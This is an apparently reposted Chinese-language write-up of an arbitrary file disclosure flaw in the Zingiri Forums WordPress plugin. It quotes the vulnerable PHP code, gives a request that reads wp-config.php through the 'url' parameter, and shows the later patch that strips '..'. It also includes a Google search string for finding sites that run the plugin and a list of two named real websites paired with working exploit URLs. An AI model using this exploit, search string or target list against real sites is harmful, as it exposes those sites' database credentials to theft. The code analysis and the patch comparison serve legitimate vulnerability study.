参考:
WordPress Zingiri Forums arbitrary file disclosure http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/
Secunia Advisory SA50833 http://secunia.com/advisories/50833/
Analysis of vulnerability
The Zingiri Web Forums for WordPress writes our a header for the forum in forum.php through adding an action to wp_head.
44 add_action('wp_head','zing_forum_header');
686 function zing_forum_header() 687 { 688 global $zing_forum_content; 689 global $zing_forum_menu; 690 $output=zing_forum_output("content"); 691 692 zing_integrator_cut($output,'<div id="footer">','</div>'); //remove footer 693 zing_integrator_cut($output,'<span class="forgot_password">','</span>'); 694 695 $zing_forum_content=$output; 696 www.2cto.com 697 echo '<script type="text/javascript" language="javascript">'; 698 echo "var zing_forum_url='".ZING_FORUM_URL."ajax/';"; 699 echo "var zing_forum_index='".get_option('home')."/index.php?';"; 700 echo "function zing_forum_url_ajax(s) { return zing_forum_url+s; }"; 701 echo '</script>'; 702 703 echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen" />'; 704 }
So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes it into zing_forum_output, which is rather long. I’ve highlighted two areas:
456 function zing_forum_output($process) { 457 global $post,$wpdb,$zing_forum_loaded,$zing_forum_to_include,$zing_forum_mode; 458 459 $postVar=array(); 460 switch ($process) 461 { 462 case "content": 463 if (isset($post)) $cf=get_post_custom($post->ID); 464 if (isset($_GET['zforum'])) 465 { 466 $zing_forum_to_include=$_GET['zforum']; 467 $zing_forum_mode="forum"; 468 }
We can affect the value of $zing_forum_to_include through the zforum GET variable. This is then used in a big else if statement. Here is the block of code that is executed if we set that to css:
541 } elseif ($zing_forum_to_include=='css') { 542 ob_end_clean(); 543 if (isset($_GET['stylesheet'])) $key=$_GET['stylesheet']; 544 else $key=$_GET['url']; 545 if (isset($_SESSION['ccforum']['stylesheet'][$key])) { 546 $output=$_SESSION['ccforum']['stylesheet'][$key]; 547 } else { 548 if (isset($_GET['stylesheet'])) { 549 $http=zing_forum_http("mybb",'css.php',""); 550 $news = new zHttpRequest($http,'zingiri-forum'); 551 if (!$news->curlInstalled()) return "cURL not installed"; 552 elseif (!$news->live()) return "A HTTP Error occured"; 553 $output=$news->DownloadToString(); 554 $output=str_replace('url(images/','url('.ZING_MYBB_URL.'/images/',$output); 555 556 } elseif ($_GET['url']) { 557 $url=$_GET['url']; 558 $output=file_get_contents(ZING_MYBB_DIR.'/cache/themes/'.$url); 559 } 560 $f[]='/^body.*{(.*?)/'; 561 $r[]=' {$1'; 562 $f[]='/.zingbody/'; 563 $r[]=''; 564 $f[]='/(.*?).{(.*?)/'; 565 $r[]='.ccforum $1 {$2'; 566 $f[]='/(.*?),(.*?).{(.*?)/'; 567 $r[]='$1,.ccforum $2 {$3'; 568 $f[]='/(.*?),(.*?),(.*?).{(.*?)/'; 569 $r[]='$1,$2,.ccforum $3 {$4'; 570 $output=preg_replace($f,$r,$output,-1,$count); 571 if ($output) $_SESSION['ccforum']['stylesheet'][$key]=$output; 572 } 573 header("Content-type: text/css"); 574 echo $output; 575 die();
If we don’t set anything expect the [url] get variable, we can cause it to be fed into the file_get_contents call on line 554. We can abuse this to disclose the contents of the wp-config.php file like this:
http://URL/wordpress/?zforum=css&url=wp-config.php
谷歌:inurl:plugins/zingiri-forum
躺枪列表: http://themakeupmorgue.com/?zforum=css&url=wp-config.php http://www.4newdesign.com/?zforum=css&url=wp-config.php
修复手法:
1.4.2版对比1.4.4版 557 $url=$_GET['url']; 修改为 555 $url=str_replace('..','',$_GET['url']);
过滤了[..],不让跳上层目录。
查看更多关于WordPress Zingiri Forums arbitrary file disclosure的详细内容...